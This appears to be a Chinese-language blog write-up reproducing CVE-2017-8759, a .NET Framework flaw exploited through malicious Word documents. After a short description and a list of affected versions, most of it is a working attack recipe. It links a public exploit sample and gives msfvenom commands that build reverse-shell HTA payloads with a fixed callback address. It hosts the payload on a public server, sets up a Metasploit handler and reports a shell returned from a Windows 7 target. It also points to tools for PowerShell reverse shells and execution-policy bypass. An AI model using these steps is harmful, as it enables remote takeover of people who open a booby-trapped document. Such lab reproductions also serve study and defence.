CVE-2017-8759 微軟word漏洞復現以及利用
0x00 漏洞描述
近日,360集團核心安全事業部分析團隊發現一個新型的Office文檔高級威脅攻擊,攻擊使用了9月12日補丁剛修復的.NET Framework漏洞,該漏洞在野外被利用時為0day狀態,用戶打開惡意的Office文檔就會中招。該漏洞的技術原理和今年黑客“奧斯卡”Pwnie Awards上的最佳客戶端漏洞(CVE-2017-0199)如出一轍,不同的是,這次黑客在Offcie文檔中嵌入新的Moniker對象,利用的是.net庫漏洞,在Office文檔中加載執行遠程的惡意.NET代碼,而整個漏洞的罪魁禍首競是.NET Framework一個換行符處理失誤。
影響范圍:
Microsoft .NET Framework 4.6.2
Microsoft .NET Framework 4.6.1
Microsoft .NET Framework 3.5.1
Microsoft .NET Framework 4.7
Microsoft .NET Framework 4.6
Microsoft .NET Framework 4.5.2
Microsoft .NET Framework 3.5
Microsoft .NET Framework 2.0 SP2
0x01 驗證漏洞
exploit-sample地址:https://github.com/Voulnet/CVE-2017-8759-Exploit-sample
將文件下載下來,打開所在的文件夾,在當前文件夾創建一個命令行,運行:
python -m SimpleHTTPServer 8080
這個時候我們已經在本地的8080端口創建了一個服務器了
然后打開doc文件,啟用編輯,就會彈出畫圖工具,漏洞驗證成功
0x02 漏洞利用
環境說明:
- ip: 120.27.32.227 這是我在公網的主機
- ip: 192.168.242.137 虛擬機的kali
- 靶機: windows7 我的實體機,虛擬機沒有裝了office的
1. 分析流程
word的宏
exploit.txt 文件
cmd.hta文件
所以流程是:
word宏 ==》 exploit.txt ==》 cmd.hta
2. 修改利用
- 我將exploit.txt修改成如下然后上傳到我自己的服務器120.27.32.227
訪問文件
fn.hta是我用msfvenom生成的,具體命令如下
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.242.137 LPORT=7777 -f hta-psh -o /var/fn.hta
或者
msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.242.137 LPORT=7777 -f hta-psh -o /var/fn.hta
- 修改宏
- 然后上傳fn.hta到服務器120.27.32.227
3.驗證
虛擬機kali(192.168.242.137)啟動metasploit
use exploit/multi/handler
set PAYLOAD windows/x64/shell/reverse_tcp
set LHOST 192.168.242.137
set LPORT 7777
exploit
修改過宏的文檔在win7打開,反彈回來一個shell
打開word文檔的這個過程,360會進行提示但不是報毒,最后還會留下這么一個窗口
至此,漏洞驗證到利用結束
0x03 漏洞利用思路
- 可以利用powershell進行注入反彈,gitHub地址:https://github.com/besimorhino/powercat
- 也可以利用hta文件
這兩者利用參考文章freebuf有:http://www.freebuf.com/sectool/90362.html
最后,參考文檔:
- 漏洞預警:http://bobao.360.cn/learning/detail/4416.html
- powershell反彈shell: https://www.secpulse.com/archives/32096.html
- powersehll注入技巧:http://bobao.360.cn/learning/detail/3808.html
- 繞過PowerShell Execution Policy:http://www.freebuf.com/articles/system/93829.html